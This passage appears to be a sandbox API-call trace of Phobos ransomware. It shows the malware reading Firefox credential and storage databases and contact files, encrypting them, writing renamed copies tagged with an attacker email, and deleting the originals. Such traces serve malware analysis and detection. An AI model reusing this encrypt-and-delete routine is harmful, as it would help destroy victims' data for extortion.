HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.907] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0202.907] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.907] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x50000, lpOverlapped=0x0) returned 1 [0202.943] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50010, dwBufLen=0x50010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50010) returned 1 [0202.947] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x50010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x50010, lpOverlapped=0x0) returned 1 [0202.953] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0202.953] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.953] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0202.953] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.953] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0202.953] CryptDestroyKey (hKey=0xa328e8) returned 1 [0202.953] CloseHandle (hObject=0x178) returned 1 [0202.953] CloseHandle (hObject=0x124) returned 1 [0202.953] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite")) returned 1 [0202.970] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0202.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.971] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=98304) returned 1 [0202.971] CloseHandle (hObject=0x124) returned 1 [0202.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite")) returned 0x2020 [0202.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.971] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.971] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.973] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0202.973] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.973] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x18000, lpOverlapped=0x0) returned 1 [0203.074] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x18010, dwBufLen=0x18010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x18010) returned 1 [0203.074] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x18010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x18010, lpOverlapped=0x0) returned 1 [0203.077] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0203.077] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0203.077] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0203.077] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.077] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0203.077] CryptDestroyKey (hKey=0xa328e8) returned 1 [0203.077] CloseHandle (hObject=0x124) returned 1 [0203.077] CloseHandle (hObject=0x178) returned 1 [0203.078] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite")) returned 1 [0203.082] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0203.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0203.082] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1178) returned 1 [0203.082] CloseHandle (hObject=0x178) returned 1 [0203.082] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact")) returned 0x20 [0203.082] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0203.083] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0203.083] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0203.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0203.083] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0203.083] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0203.083] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x49a, lpOverlapped=0x0) returned 1 [0203.164] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4a0, dwBufLen=0x4a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4a0) returned 1 [0203.164] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4a0, lpOverlapped=0x0) returned 1 [0203.165] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0203.165] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0203.165] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0203.165] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.165] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0203.165] CryptDestroyKey (hKey=0xa328e8) returned 1 [0203.165] CloseHandle (hObject=0x178) returned 1 [0203.165] CloseHandle (hObject=0x124) returned 1 [0203.165] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact")) returned 1 [0203.166] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0203.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0203.168] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=68382) returned 1 [0203.168] CloseHandle (hObject=0x124) returned 1 [0203.169] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact")) returned 0x20 [0203.169] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0203.169] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0203.169] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0203.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0203.170] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0203.170] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0203.170] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x10b1e, lpOverlapped=0x0) returned 1 [0204.398] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10b20, dwBufLen=0x10b20 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10b20) returned 1 [0204.399] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x10b20, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x10b20, lpOverlapped=0x0) returned 1 [0204.401] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0204.401] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.401] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0204.401] CryptDestroyKey (hKey=0xa32928) returned 1 [0204.401] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0204.401] CryptDestroyKey (hKey=0xa328e8) returned 1 [0204.402] CloseHandle (hObject=0x124) returned 1 [0204.402] CloseHandle (hObject=0x178) returned 1 [0204.402] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact")) returned 1 [0204.403] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0204.403] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0204.404] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1171) returned 1 [0204.404] CloseHandle (hObject=0x178) returned 1 [0204.404] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact")) returned 0x20 [0204.404] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0204.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0204.404] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.405] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0204.405] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0204.405] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.406] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x493, lpOverlapped=0x0) returned 1 [0204.557] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4a0, dwBufLen=0x4a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4a0) returned 1 [0204.557] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4a0, lpOverlapped=0x0) returned 1 [0204.558] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0204.558] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.558] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0204.558] CryptDestroyKey (hKey=0xa32928) returned 1 [0204.558] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0204.558] CryptDestroyKey (hKey=0xa328e8) returned 1 [0204.558] CloseHandle (hObject=0x178) returned 1 [0204.558] CloseHandle (hObject=0x124) returned 1 [0204.558] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact")) returned 1 [0204.559] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0204.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0204.561] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1177) returned 1 [0204.562] CloseHandle (hObject=0x124) returned 1 [0204.562] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact")) returned 0x20 [0204.562] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0204.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0204.562] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.562] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0204.563] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0204.563] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.563] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x499, lpOverlapped=0x0) returned 1 [0204.593] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4a0, dwBufLen=0x4a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4a0) returned 1 [0204.593] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4a0, lpOverlapped=0x0) returned 1 [0204.594] CryptImportKey (in: hProv=0xa24cf8, 